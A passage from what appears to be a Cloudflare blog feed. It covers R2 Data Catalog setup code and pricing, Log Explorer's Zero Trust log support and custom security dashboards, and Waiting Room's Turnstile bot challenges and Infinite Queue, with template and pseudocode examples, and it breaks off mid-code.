    name="my_catalog",
    warehouse=WAREHOUSE,
    uri=CATALOG_URI,
    token=TOKEN,
)

# Create default namespace
catalog.create_namespace("default")

# Create simple PyArrow table
df = pa.table({
    "id": [1, 2, 3],
    "name": ["Alice", "Bob", "Charlie"],
})

# Create an Iceberg table
table = catalog.create_table(
    ("default", "my_table"),
    schema=df.schema,
)

# Write the PyArrow data into the Iceberg table
table.append(df)</code></pre>
            <p>You can now append more data or run queries, just as you would with any Apache Iceberg table.</p>
    <div>
      <h2>Pricing</h2>
      <a href="#pricing">
        
      </a>
    </div>
    <p>While R2 Data Catalog is in open beta, there will be no additional charges beyond standard R2 storage and operations costs incurred by query engines accessing data. <a href="https://r2-calculator.cloudflare.com/"><u>Storage pricing</u></a> for buckets with R2 Data Catalog enabled remains the same as standard R2 buckets – $0.015 per GB-month. As always, egress directly from R2 buckets remains $0.</p><p>In the future, we plan to introduce pricing for catalog operations (e.g., creating tables, retrieving table metadata, etc.) and data compaction.</p><p>Below is our current thinking on future pricing. We’ll communicate more details around timing well before billing begins, so you can confidently plan your workloads.</p><div>
    <figure>
        <table>
            <colgroup>
                <col></col>
                <col></col>
            </colgroup>
            <tbody>
                <tr>
                    <td> </td>
                    <td>
                        <p><span><span><strong>Pricing</strong></span></span></p>
                    </td>
                </tr>
                <tr>
                    <td>
                        <p><span><span>R2 storage</span></span></p>
                        <p><span><span>For standard storage class</span></span></p>
                    </td>
                    <td>
                        <p><span><span>$0.015 per GB-month (no change)</span></span></p>
                    </td>
                </tr>
                <tr>
                    <td>
                        <p><span><span>R2 Class A operations</span></span></p>
                    </td>
                    <td>
                        <p><span><span>$4.50 per million operations (no change)</span></span></p>
                    </td>
                </tr>
                <tr>
                    <td>
                        <p><span><span>R2 Class B operations</span></span></p>
                    </td>
                    <td>
                        <p><span><span>$0.36 per million operations (no change)</span></span></p>
                    </td>
                </tr>
                <tr>
                    <td>
                        <p><span><span>Data Catalog operations</span></span></p>
                        <p><span><span>e.g., create table, get table metadata, update table properties</span></span></p>
                    </td>
                    <td>
                        <p><span><span>$9.00 per million catalog operations</span></span></p>
                    </td>
                </tr>
                <tr>
                    <td>
                        <p><span><span>Data Catalog compaction data processed</span></span></p>
                    </td>
                    <td>
                        <p><span><span>$0.05 per GB processed</span></span></p>
                        <p><span><span>$4.00 per million objects processed</span></span></p>
                    </td>
                </tr>
                <tr>
                    <td>
                        <p><span><span>Data egress</span></span></p>
                    </td>
                    <td>
                        <p><span><span>$0 (no change, always free)</span></span></p>
                    </td>
                </tr>
            </tbody>
        </table>
    </figure>
</div>
    <div>
      <h2>What’s next?</h2>
      <a href="#whats-next">
        
      </a>
    </div>
    <p>We’re excited to see how you use R2 Data Catalog! If you’ve never worked with Iceberg – or even analytics data – before, we think this is the easiest way to get started.</p><p>Next on our roadmap is tackling compaction and table optimization. Query engines typically perform better when dealing with fewer but larger data files. We will automatically rewrite collections of small data files into larger files to deliver even faster query performance. </p><p>We’re also collaborating with the broader Apache Iceberg community to expand query-engine compatibility with the Iceberg REST Catalog spec.</p><p>We’d love your feedback. Join the <a href="https://discord.cloudflare.com/"><u>Cloudflare Developer Discord</u></a> to ask questions and share your thoughts during the public beta. For more details, examples, and guides, visit our <a href="https://developers.cloudflare.com/r2/data-catalog/get-started/"><u>developer documentation</u></a>.</p> ]]></content:encoded>
            <category><![CDATA[Developer Week]]></category>
            <category><![CDATA[R2]]></category>
            <category><![CDATA[Data Catalog]]></category>
            <category><![CDATA[Storage]]></category>
            <category><![CDATA[Developer Platform]]></category>
            <category><![CDATA[Product News]]></category>
            <guid isPermaLink="false">6JFB9cHUOoMZnVmYIuTLzd</guid>
            <dc:creator>Phillip Jones</dc:creator>
            <dc:creator>Garvit Gupta</dc:creator>
            <dc:creator>Alex Graham</dc:creator>
            <dc:creator>Garrett Gu</dc:creator>
        </item>
        <item>
            <title><![CDATA[Cloudflare enables native monitoring and forensics with Log Explorer and custom dashboards]]></title>
            <link>https://blog.cloudflare.com/monitoring-and-forensics/</link>
            <pubDate>Tue, 18 Mar 2025 13:00:00 GMT</pubDate>
            <description><![CDATA[ Today we are excited to announce support for Zero Trust datasets, and custom dashboards where customers can monitor critical metrics for suspicious or unusual activity.  ]]></description>
            <content:encoded><![CDATA[ <p>In 2024, we <a href="https://blog.cloudflare.com/log-explorer/"><u>announced Log Explorer</u></a>, giving customers the ability to store and query their HTTP and security event logs natively within the Cloudflare network. Today, we are excited to announce that Log Explorer now supports logs from our Zero Trust product suite. In addition, customers can create custom dashboards to monitor suspicious or unusual activity.</p><p>Every day, Cloudflare detects and protects customers against billions of threats, including DDoS attacks, bots, web application exploits, and more. SOC analysts, who are charged with keeping their companies safe from the growing spectre of Internet threats, may want to investigate these threats to gain additional insights on attacker behavior and protect against future attacks. Log Explorer, by collecting logs from various Cloudflare products, provides a single starting point for investigations. As a result, analysts can avoid forwarding logs to other tools, maximizing productivity and minimizing costs. Further, analysts can monitor signals specific to their organizations using custom dashboards.</p>
    <div>
      <h2>Zero Trust dataset support in Log Explorer</h2>
      <a href="#zero-trust-dataset-support-in-log-explorer">
        
      </a>
    </div>
    <p>Log Explorer stores your Cloudflare logs for a 30-day retention period so that you can analyze them natively and in a single interface, within the Cloudflare Dashboard. Cloudflare log data is diverse, reflecting the breadth of capabilities available. For example, HTTP requests contain information about the client such as their IP address, request method, <a href="https://www.cloudflare.com/learning/network-layer/what-is-an-autonomous-system/"><u>autonomous system (ASN)</u></a>, request paths, and TLS versions used. Additionally, Cloudflare’s Application Security <a href="https://developers.cloudflare.com/waf/detections/"><u>WAF Detections</u></a> enrich these HTTP request logs with additional context, such as the <a href="https://developers.cloudflare.com/waf/detections/attack-score/"><u>WAF attack score</u></a>, to identify threats.</p><p>Today we are announcing that seven additional Cloudflare product datasets are now available in Log Explorer. These seven datasets are the logs generated from our Zero Trust product suite, and include logs from <a href="https://developers.cloudflare.com/logs/reference/log-fields/account/access_requests/"><u>Access</u></a>, <a href="https://developers.cloudflare.com/logs/reference/log-fields/account/gateway_dns/"><u>Gateway DNS</u></a>, <a href="https://developers.cloudflare.com/logs/reference/log-fields/account/gateway_http/"><u>Gateway HTTP</u></a>, <a href="https://developers.cloudflare.com/logs/reference/log-fields/account/gateway_network/"><u>Gateway Network</u></a>, <a href="https://developers.cloudflare.com/logs/reference/log-fields/account/casb_findings/"><u>CASB</u></a>, <a href="https://developers.cloudflare.com/logs/reference/log-fields/account/zero_trust_network_sessions/"><u>Zero Trust Network Session</u></a>, and <a href="https://developers.cloudflare.com/logs/reference/log-fields/account/device_posture_results/"><u>Device Posture Results</u></a>. Read on for examples of how to use these logs to identify common threats.</p>
    <div>
      <h3>Investigating unauthorized access</h3>
      <a href="#investigating-unauthorized-access">
        
      </a>
    </div>
    <p>Reviewing Access logs and HTTP request logs can reveal attempts to access resources or systems without proper permissions, including brute force password attacks, indicating potential security breaches or malicious activity.</p><p>Below, we filter Access logs on the <code>Allowed</code> field to see activity related to unauthorized access.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/2piOIdnNz9OWskJqrZJfcf/f88673fc184c23de493920661020e7b3/access_requests.png" />
          </figure><p>By then reviewing the HTTP logs for the requests identified in the previous query, we can assess if bot networks are the source of unauthorized activity.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4b38nYNdpLbmHFt0BHkapa/88e1acf82d8bbc257a7cbbe102cbd723/http_requests.png" />
          </figure><p>With this information, you can craft targeted <a href="https://developers.cloudflare.com/waf/custom-rules/"><u>Custom Rules</u></a> to block the offending traffic. </p>
    <div>
      <h3>Detecting malware</h3>
      <a href="#detecting-malware">
        
      </a>
    </div>
    <p>Cloudflare's <a href="https://developers.cloudflare.com/cloudflare-one/policies/gateway/"><u>Web Gateway</u></a> can track which websites users are accessing, allowing administrators to identify and block access to malicious or inappropriate sites. These logs can be used to detect whether a user’s machine or account has been compromised by malware. Compromise may become apparent when we look for records showing a rapid succession of attempts to browse known malicious sites, such as hostnames with long strings of seemingly random characters that hide their true destination. In this example, we can query logs looking for requests to a spoofed YouTube URL.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5Nkm4udjUw9tmzPk0Fk1eK/524dc1a6d4070a1f6cc9478e09b67ffd/gateway_requests.png" />
          </figure>
    <div>
      <h2>Monitoring what matters using custom dashboards</h2>
      <a href="#monitoring-what-matters-using-custom-dashboards">
        
      </a>
    </div>
    <p>Security monitoring is not one-size-fits-all. For instance, companies in the retail or financial industries worry about fraud, while every company is concerned about the exfiltration of sensitive data, such as trade secrets. And any form of personally identifiable information (PII) is a target for data breaches or ransomware attacks.</p><p>While log exploration helps you react to threats, our new custom dashboards allow you to define the specific metrics you need in order to monitor the threats you are concerned about. </p><p>Getting started is easy: a natural language interface is integrated into the chart create/edit experience, enabling you to describe in your own words the chart you want to create. Similar to the <a href="https://blog.cloudflare.com/security-analytics-ai-assistant/"><u>AI Assistant</u></a> we announced during Security Week 2024, the prompt translates your description into the appropriate chart configuration, which can then be added to a new or existing custom dashboard.</p><ul><li><p><b>Use a prompt</b>: Enter a query like “Compare status code ranges over time”. The AI model decides the most appropriate visualization and constructs your chart configuration.</p></li><li><p><b>Customize your chart</b>: Select the chart elements manually, including the chart type, title, dataset to query, metrics, and filters. This option gives you full control over your chart’s structure. </p></li></ul><div>
  
</div>
<br /><p><sup><i>Video shows entering a natural language description of the desired metric, “compare status code ranges over time”; the previewed chart is a time series grouped by status code range, and selecting “Add chart” saves it to the dashboard.</i></sup></p><p>For more help getting started, we have some pre-built templates that you can use to monitor specific use cases. Available templates currently include: </p><ul><li><p><b>Bot monitoring</b>: Identify automated traffic accessing your website</p></li><li><p><b>API Security:</b> Monitor the data transfer and exceptions of API endpoints within your application</p></li><li><p><b>API Performance</b>: See timing data for API endpoints in your application, along with error rates</p></li><li><p><b>Account Takeover:</b> View login attempts, usage of leaked credentials, and identify account takeover attacks</p></li><li><p><b>Performance Monitoring</b>: Identify slow hosts and paths on your origin server, and view <a href="https://blog.cloudflare.com/ttfb-is-not-what-it-used-to-be/"><u>time to first byte (TTFB)</u></a> metrics over time</p></li></ul><p>Templates provide a good starting point, and once you create your dashboard, you can add or remove individual charts using the same natural language chart creator. </p><div>
  
</div>
<br /><p><sup><i>Video shows editing a chart in an existing dashboard and rearranging individual charts via drag and drop.</i></sup></p>
    <div>
      <h3>Example use cases</h3>
      <a href="#example-use-cases">
        
      </a>
    </div>
    <p>Custom dashboards can be used to monitor for suspicious activity, or to keep an eye on performance and errors for your domains. Let’s explore some examples of suspicious activity that we can monitor using custom dashboards.</p><p>Take, for example, our use case from above: investigating unauthorized access. With custom dashboards, you can create a dashboard using the <b>Account takeover</b> template to monitor for suspicious login activity related to your domain.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/72KBaEdr0bEn4SNwKOfPfJ/e28997b94630cf856d3924e9ba443063/image7.png" />
          </figure><p>As another example, spikes in requests or errors are common indicators that something is wrong, and they can sometimes be signals of suspicious activity. With the Performance Monitoring template, you can view origin response time and time to first byte metrics as well as monitor for common errors. For example, in this chart, the spikes in 404 errors could be an indication of an unauthorized scan of your endpoints.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3krBxVm8dB5pr5XEoHnVtK/44f682436c3d5a63baa1105987347433/image1.jpg" />
          </figure>
    <div>
      <h3>Seamlessly integrated into the Cloudflare platform</h3>
      <a href="#seamlessly-integrated-into-the-cloudflare-platform">
        
      </a>
    </div>
    <p>When using custom dashboards, if you observe a traffic pattern or spike in errors that you would like to investigate further, you can click “View in Security Analytics” to drill down into the data and craft custom WAF rules to mitigate the threat.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5XfvQ24bvDmnNKeInyA8eU/e96798a72e55fa454439f8b85197e02b/image2.png" />
          </figure><p>These tools, seamlessly integrated into the Cloudflare platform, enable users to discover, investigate, and mitigate threats all in one place, reducing time to resolution and overall cost of ownership by eliminating the need to forward logs to third-party security analysis tools. And because these tools are a native part of Cloudflare, you can immediately use the data from your investigation to craft targeted rules that will block these threats.</p>
    <div>
      <h2>What’s next</h2>
      <a href="#whats-next">
        
      </a>
    </div>
    <p>Stay tuned as we continue to develop more capabilities in the areas of <a href="https://www.cloudflare.com/learning/performance/what-is-observability/">observability and forensics</a>, with additional features including: </p><ul><li><p><b>Custom alerts</b>: create alerts based on specific metrics or anomalies</p></li><li><p><b>Scheduled query detections</b>: craft log queries and run them on a schedule to detect malicious activity</p></li><li><p><b>More integration</b>: further streamlining the journey across detection, investigation, and mitigation on the full Cloudflare platform.</p></li></ul>
    <div>
      <h2>How to get it</h2>
      <a href="#how-to-get-it">
        
      </a>
    </div>
    <p>Current Log Explorer beta users get immediate access to the new custom dashboards feature. Pricing will be announced, and these features made available to everyone, during Q2 2025; until then, they remain available at no cost.</p><p>Let us know if you are interested in joining our beta program by completing <a href="https://www.cloudflare.com/lp/log-explorer/"><u>this form</u></a>, and a member of our team will contact you.</p>
    <div>
      <h2>Watch on Cloudflare TV</h2>
      <a href="#watch-on-cloudflare-tv">
        
      </a>
    </div>
    <div>
  
</div><p></p> ]]></content:encoded>
            <category><![CDATA[Security Week]]></category>
            <category><![CDATA[Analytics]]></category>
            <category><![CDATA[Logs]]></category>
            <category><![CDATA[Security]]></category>
            <category><![CDATA[SIEM]]></category>
            <category><![CDATA[Product News]]></category>
            <category><![CDATA[Connectivity Cloud]]></category>
            <guid isPermaLink="false">76XBFojN0mhfyCoz6VRe1G</guid>
            <dc:creator>Jen Sells</dc:creator>
        </item>
        <item>
            <title><![CDATA[Banish bots from your Waiting Room and improve wait times for real users]]></title>
            <link>https://blog.cloudflare.com/banish-bots-from-your-waiting-room-and-improve-wait-times-for-real-users/</link>
            <pubDate>Mon, 03 Mar 2025 14:00:00 GMT</pubDate>
            <description><![CDATA[ Cloudflare Waiting Room is improving the user experience through the addition of Turnstile and Session Revocation, keeping wait times low and protecting against bot traffic. ]]></description>
            <content:encoded><![CDATA[ <p>With <a href="https://www.cloudflare.com/application-services/products/waiting-room/?cf_target_id=80139F59125DEFCA9DD4FAF8C6C73D4F"><u>Cloudflare Waiting Room,</u></a> you can safeguard your site from traffic surges by placing visitors in a customizable, virtual queue. Previously, many site visitors waited in the queue alongside bots, only to find themselves competing for inventory once in the application. This competition is inherently unfair, as bots are much faster and more efficient than humans. As a result, humans inevitably lose out in these high-demand situations, unable to secure inventory before bots sweep it all up. This creates a frustrating experience for real customers, who feel powerless against the speed and automation of bots, leading to a diminished experience overall. Those days are over! Today, we are thrilled to announce the launch of two Waiting Room solutions that significantly improve the visitor experience.</p><p>Now, <b>all</b> Waiting Room customers can add an invisible <a href="https://www.cloudflare.com/application-services/products/turnstile/?cf_history_state=%7B%22guid%22%3A%22C255D9FF78CD46CDA4F76812EA68C350%22%2C%22historyId%22%3A21%2C%22targetId%22%3A%222734F402BB1100617F807DE827E8036D%22%7D"><u>Turnstile </u></a>challenge to their queueing page, robustly challenging traffic and gathering analytics on bot activity within their queue. With Advanced Waiting Rooms, you can select between an <a href="https://developers.cloudflare.com/turnstile/concepts/widget/#widget-types"><u>invisible, managed, or non-interactive widget mode</u></a>. But, we won’t just block these bots! Instead, traffic with definite bot signals that have failed the Turnstile challenge can be sent to an Infinite Queue, a completely customizable page that mimics a real user experience. This prolongs the time it takes bots to realize they have not actually joined the queue, wasting their resources without impacting real users. 
This feature not only protects your site against bots, but also reduces wait times and protects inventory by ensuring the queue only consists of genuine users. To offset the environmental impact of wasting bot resources, we’re contributing to a <a href="https://blog.cloudflare.com/cleaning-up-bad-bots/#planting-trees"><u>tree planting initiative</u></a>, helping to reduce the carbon footprint of inefficient bots. </p><p>The second solution we have launched to improve the visitor experience is Session Revocation, which allows you to end a user’s session based on an action, dynamically opening up spots and admitting users from the queue. This new capability allows you to integrate Waiting Room more seamlessly with your customer journey, resulting in increased throughput, decreased wait times, and increased fairness by giving more users the opportunity to make it through the queue during high demand events. </p><p>This feature has proven to be extremely impactful for our customers, including a large online retailer that frequently has high-demand limited edition product drops. A common challenge in this space is maximizing the number of customers who can make a purchase during a limited-time event, all while maintaining a fair and efficient system for everyone involved. Previously, this customer had to limit their users to only one item in the cart and force them to wait for a period of time after each checkout before allowing them to rejoin the queue. This led to an awkward experience for end users, longer wait times, and reduced site throughput. With session revocation, this online retailer can now end the user’s session immediately after a purchase is complete, placing the user back in the queue if applicable, <b>without </b>being forced to wait for a preset timeout period. 
This significantly improves the end user experience by reducing unnecessary wait times and streamlining the purchase process.</p><p>Let’s deep dive into these two capabilities and how they improve the overall user experience.</p>
    <div>
      <h3>How bots impact the Waiting Room user experience </h3>
      <a href="#how-bots-impact-the-waiting-room-user-experience">
        
      </a>
    </div>
    <p>Waiting Room is often used to protect sites from being overwhelmed by traffic surges during high-demand online events. These high-demand events, such as ticket or e-commerce product sales, attract both a deluge of genuine users and sophisticated bots, such as scalper bots. This type of bot traffic is unique in that these bots can complete the checkout process or user journey much more quickly than human traffic. Bots in the queue negatively affect the user experience by increasing wait times, as they often occupy multiple spots. Additionally, their behavior can exacerbate the issue — if they don't handle cookies properly, they fail to take their spot in the application when their turn comes, further preventing the queue from progressing smoothly. Once past the queue, bots can also contribute to inventory hoarding, as they often reserve or consume large quantities of stock without genuine intent to purchase. An <a href="https://www.nbcnews.com/tech/video-games/good-luck-finding-playstation-5-walmart-retailers-battle-fast-buying-b-rcna193"><u>example</u></a> of this is the PlayStation 5’s launch in November 2020. Due to high demand and production limitations during the COVID-19 pandemic, scalper bots bought up stock quickly, making it difficult for average consumers to purchase the console at retail prices. This led to extreme frustration for retailers and consumers alike, as these bots drove prices up significantly. </p>
    <div>
      <h3>Quantifying bot traffic to Waiting Room with an invisible Turnstile challenge</h3>
      <a href="#quantifying-bot-traffic-to-waiting-room-with-an-invisible-turnstile-challenge">
        
      </a>
    </div>
    <p>Waiting Room customers have long been curious about the nature of large traffic spikes. Historically, <a href="https://developers.cloudflare.com/bots/concepts/bot-score/"><u>bot scores</u></a> and <a href="https://developers.cloudflare.com/waf/reference/cloudflare-challenges/"><u>managed challenges</u></a> have been the primary methods of collecting this data and acting on it. While these can provide some insight into the distribution of traffic, the Turnstile invisible challenge gives us the ability to actively interrogate the browser, providing the most complete set of data on whether that browser is being operated by a human or a bot. </p><p>To start quantifying bot traffic to waiting rooms, we have added an invisible Turnstile challenge to all basic rooms. With the purchase of an Advanced Waiting Room, customers can select between invisible, managed, or non-interactive widget modes. This Turnstile team <a href="https://blog.cloudflare.com/guide-to-cloudflare-pages-and-turnstile-plugin/?_gl=1*1fb6wb0*_gcl_au*Mzg4NDc3ODA1LjE3MzY3ODc4NjI.*_ga*MTI5NDczNzY0Ny4xNzM0NzEyNjMx*_ga_SQCRB0TXZW*MTczODYwNDE5Ny4xNC4xLjE3Mzg2MDQ4MDIuMjUuMC4w/#step-2-embed-turnstile-widget"><u>blog post</u></a> has more details on the different widget modes.  </p><p>Waiting Room’s integration with Turnstile aims to protect your site with minimal impact to the user experience by placing a Turnstile challenge on your waiting room’s queuing page. Unlike a standard WAF challenge, the Waiting Room Turnstile challenge is presented only when the waiting room is queuing. This way, users won’t face any interruptions once they are past the queue and into the application. </p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3GLXMvDBi5jBTs9rxQXBin/e75077558061fd5afe0a0244d807814c/image8.png" />
          </figure><p><sup><i>With an advanced waiting room, you can configure the type of Turnstile challenge from the Cloudflare dashboard and API.</i></sup></p><p>From the analytics we’ve gathered with the invisible Turnstile challenge on all basic waiting rooms, we’ve been able to determine that many large traffic spikes come from user agents that don’t even attempt to run the challenge, leaving it unsolved. In other words, we send the challenge widget in the HTML for the queuing page, but sometimes those challenges never get completed. By subtracting the number of times we see solved challenges from the total number of times we send challenges, we can get a count of requests that are likely from unsophisticated bots. These requests are reported to Waiting Room Analytics as “Likely Bots.” We’ve seen small businesses with low baseline traffic hit with tens of thousands of such requests (or more) in a short period of time. When a large influx of non-human traffic like this comes in, every visitor to the website ends up queued in a waiting room, not just the bots.</p><p>These bots could be any software that simply sends out HTTP requests. This data can help determine whether a traffic spike and subsequent queueing is coming from real human users, or a bunch of simple bots that don’t even bother to run JavaScript.</p><p>With the Turnstile integration, we are also catching sophisticated bots. While many of the bots we see don’t attempt to run the challenge, there are a few that do. Detecting these bots is more difficult than detecting simple bots that don’t run JavaScript. The Turnstile widget runs a series of checks against the browser to find evidence that a browser isn’t being operated by a human, and is instead being driven by something like <a href="https://www.selenium.dev/"><u>Selenium</u></a>. 
If Turnstile isn’t able to determine that the browser is being operated by a human, we count that as a failed challenge and report those users to Waiting Room Analytics as “Bots,” since we are quite confident that these users are not human.</p><p>About 1 in 20 “users” that run the challenge end up not passing. Just like the previously mentioned unsophisticated bots, these more sophisticated bots inflate the size of the queue, making it more difficult for real humans to make it through to your website.</p><p>The remaining 19 in 20 “users” that successfully pass the challenge are counted in Waiting Room Analytics as “Likely Humans.”</p><p>These new metrics related to Turnstile challenge outcomes are available in your Waiting Room Analytics dashboard and the <a href="https://developers.cloudflare.com/analytics/graphql-api/"><u>analytics GraphQL API</u></a>, so you can see the distribution of bot to human traffic in your waiting room. Once you know what your traffic looks like, the real question is: what can you do about it?</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/1RVNiQAX4OE87L0H7ByyWb/b6eadb0f348d7ce711d138862b778117/image2.png" />
          </figure><p><sup><i>View the distribution of traffic and challenges issued in Waiting Room Analytics</i></sup></p>
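The classification described above is simple arithmetic over the challenge counters. A minimal sketch, using hypothetical field names (the actual metrics live in the Waiting Room Analytics GraphQL API, under its own schema):

```javascript
// Sketch of the bot/human classification described above. The field names
// (sent, attempted, passed) are illustrative, not the real analytics schema.
function classifyQueueTraffic({ sent, attempted, passed }) {
  return {
    likelyBots: sent - attempted, // widget served, but the challenge never ran
    bots: attempted - passed,     // challenge ran, but failed
    likelyHumans: passed,         // challenge ran and passed
  };
}
```

For example, a spike where 100,000 challenge widgets were served but only 20,000 ever ran would report 80,000 “Likely Bots”; if 19,000 of those 20,000 passed (the roughly 19-in-20 rate mentioned above), the remaining 1,000 are counted as “Bots”.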
    <div>
      <h3>New Infinite Queue feature</h3>
      <a href="#new-infinite-queue-feature">
        
      </a>
    </div>
    <p>Beyond logging your Turnstile challenge outcomes, Advanced Waiting Room customers have the option to enable the Infinite Queue feature. With this feature, all traffic that fails the Turnstile challenge, such as a bot, is sent to an Infinite Queue page. The Infinite Queue matches the normal queuing experience, prolonging the time it takes a bot to recognize it is being blocked and effectively consuming its resources. While the Infinite Queue has the same look and feel as the Waiting Room page, the bot is not actually part of the real queue. </p><p>With the Infinite Queue enabled, all traffic must pass the challenge to enter the real queue. By blocking bots from joining the queue, we reduce wait times for humans and prevent bots from using up server resources during a traffic spike.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/55Du8cmC3JfX4FrhL9KWIM/b273bb820290aad6997494551c0b49ac/image9.png" />
          </figure><p><sup><i>Enable the Infinite Queue option through the Cloudflare dashboard or API.</i></sup></p><p>Bots will be none the wiser, wasting their time and resources waiting in an infinite queue that will never get them to where they’re trying to go.</p><p>We keep track of the traffic hitting the infinite queue, counting the number of times they refresh their queuing page in Waiting Room Analytics. This appears as the “infinite queue refreshes” count in the analytics dash and GraphQL API. This metric gives you a good idea of the amount of time these bots have wasted trying to reach your website.</p>
    <div>
      <h3>How Waiting Room integrates with Turnstile</h3>
      <a href="#how-waiting-room-integrates-with-turnstile">
        
      </a>
    </div>
    <p>Turnstile is a powerful and versatile product that anyone, Cloudflare and others alike, can use to build systems that thwart bot traffic. Waiting Room integrates Turnstile the same way any other Turnstile user would.</p>
            <pre><code>&lt;!DOCTYPE html&gt;
&lt;html&gt;
	&lt;head&gt;
		&lt;title&gt;Waiting Room&lt;/title&gt;
	&lt;/head&gt;
	&lt;body&gt;
		&lt;h1&gt;You are currently in the queue.&lt;/h1&gt;
		{{#waitTimeKnown}}
			&lt;h2&gt;Your estimated wait time is {{waitTimeFormatted}}.&lt;/h2&gt;
		{{/waitTimeKnown}}
		{{^waitTimeKnown}}
			&lt;h2&gt;Your estimated wait time is unknown.&lt;/h2&gt;
		{{/waitTimeKnown}}
		{{#turnstile}}
			&lt;!-- for a managed (and potentially interactive) challenge, you may want to instruct the user to complete the challenge --&gt;
			&lt;p&gt;Please complete this challenge so we know you're a human:&lt;/p&gt;
			{{{turnstile}}} &lt;!-- include the turnstile widget --&gt;
		{{/turnstile}}
	&lt;/body&gt;
&lt;/html&gt;</code></pre>
            <p><sup><i>The Turnstile widget can be embedded in custom queuing page templates by including the </i></sup><code><sup><i>{{{turnstile}}}</i></sup></code><sup><i> variable.</i></sup></p>
            <pre><code>&lt;!DOCTYPE html&gt;
&lt;html&gt;
	&lt;head&gt;
		&lt;title&gt;Waiting Room&lt;/title&gt;
	&lt;/head&gt;
	&lt;body&gt;
		{{#turnstile}}
			&lt;h1&gt;This website is currently using a waiting room.&lt;/h1&gt;
			&lt;p&gt;We use a Turnstile challenge to ensure you aren't waiting in line behind bots. Complete this challenge to enter the queue.&lt;/p&gt;
			{{{turnstile}}} &lt;!-- include the turnstile widget --&gt;
		{{/turnstile}}
		{{^turnstile}}
			&lt;h1&gt;You are currently in the queue.&lt;/h1&gt;
			{{#waitTimeKnown}}
				&lt;h2&gt;Your estimated wait time is {{waitTimeFormatted}}.&lt;/h2&gt;
			{{/waitTimeKnown}}
			{{^waitTimeKnown}}
				&lt;h2&gt;Your estimated wait time is unknown.&lt;/h2&gt;
			{{/waitTimeKnown}}
		{{/turnstile}}
	&lt;/body&gt;
&lt;/html&gt;</code></pre>
            <p><sup><i>When using Infinite Queue (especially with managed challenges which may be interactive), you may want to tell users they will not be in the queue until they complete the challenge.</i></sup></p><p>We embed a plain Turnstile challenge in the queuing page by passing the HTML to the queuing page template in a <code>turnstile</code> variable. The default queuing page template and any newly created custom templates include this variable already. If you have an existing custom HTML template and wish to enable the Turnstile integration, you will need to add <code>{{{turnstile}}}</code> somewhere in the template to tell Waiting Room where the widget should be placed. Waiting Room uses <a href="https://mustache.github.io/"><u>Mustache</u></a> templates, so including raw HTML within your template without escaping requires three curly braces instead of two.</p>
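The reason three braces are needed: Mustache HTML-escapes ordinary double-brace interpolations, so the widget markup would render as visible text rather than as a widget. A rough illustration of the kind of escaping Mustache applies to a <code>{{variable}}</code> (the real library escapes a few more characters):

```javascript
// Illustration only: roughly what Mustache does to a double-brace variable.
function mustacheStyleEscape(html) {
  return html
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;');
}

// With {{turnstile}}, the widget HTML would arrive escaped and inert:
mustacheStyleEscape('<div class="cf-turnstile"></div>');
// With {{{turnstile}}}, the HTML is interpolated raw and the widget renders.
```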
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/1SLLpx14dpaGITEsSxgDqX/eecd16a85e531de0b5325df5535e8ae8/image1.png" />
          </figure><p><sup><i>A managed Turnstile challenge on the default Waiting Room queuing page template</i></sup></p><p>Once the challenge completes, fails, or times out, the page refreshes and passes the Turnstile token to <a href="https://blog.cloudflare.com/building-waiting-room-on-workers-and-durable-objects/"><u>Waiting Room’s worker</u></a>. Next, we check in with <a href="https://developers.cloudflare.com/turnstile/get-started/server-side-validation/"><u>Turnstile’s siteverify endpoint</u></a> to make sure the challenge was successful. From there, we report the outcome to the Waiting Room’s analytics and optionally send failed traffic (bots) to an infinite queue.</p><p>The infinite queue itself is designed to be as close to normal queuing as possible. When a bot is sent to the infinite queue, we issue it a cookie that looks like a normal waiting room cookie. Inside the encrypted cookie, though, we have a boolean flag that tells our worker to send the bot’s requests to the infinite queue. When we see that flag, we skip all the normal queuing logic and just render a queuing page.</p><p>That queuing page shows a fake estimated time remaining. It’s based on an asymptotic curve that appears to decrease linearly from the start. As time goes on, the curve gets flatter (and progress through the “queue” gets slower), so the estimated time remaining never quite reaches 0.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/1J2U58CHRruMQ5LTkRo0fQ/8e7116eae5ba9fdecc6ac6cf404984ea/image5.png" />
          </figure><p><sup><i>This graph is an approximation of the time remaining (y-axis, minutes) that bots will see, compared to the amount of time they’ve waited in the infinite queue (x-axis, minutes).</i></sup></p><p>We reuse much of the same code for rendering the queuing page for the infinite queue and the normal queue. We do this to reduce the amount of signal bots may have that they are in the infinite queue rather than the normal queue.</p>
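One way to produce a curve with that shape, sketched below as a hypothetical formula (not the production implementation): the estimate starts at its initial value, appears to tick down about a minute per minute at first, then flattens out and never reaches zero.

```javascript
// Hypothetical sketch of an asymptotic "time remaining" curve; not the
// production formula. initialEstimate: minutes displayed at t = 0;
// waited: minutes spent refreshing the infinite queue so far.
function fakeTimeRemaining(initialEstimate, waited) {
  // With halfLife equal to the initial estimate, the curve starts with
  // slope -1 (roughly linear progress), then decays toward zero without
  // ever reaching it.
  const halfLife = initialEstimate;
  return (initialEstimate * halfLife) / (halfLife + waited);
}
```

With an initial estimate of 10 minutes, a bot sees 10 minutes remaining at first, 5 minutes remaining after waiting 10 minutes, and a small nonzero estimate even after waiting for hours.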
            <pre><code>let cookie
if (query['cf_wr_turnstile']) {
    const turnstileToken = query['cf_wr_turnstile']
    const tokenOk = await siteverify(turnstileToken)
    if (tokenOk) {
        analytics.turnstileSuccesses++
        cookie = newCookie()
    } else {
        analytics.turnstileFailures++
        cookie = { infiniteQueuing: true }
    }
    response.headers['Set-Cookie'] = encryptCookie(cookie)
}
if (!cookie) {
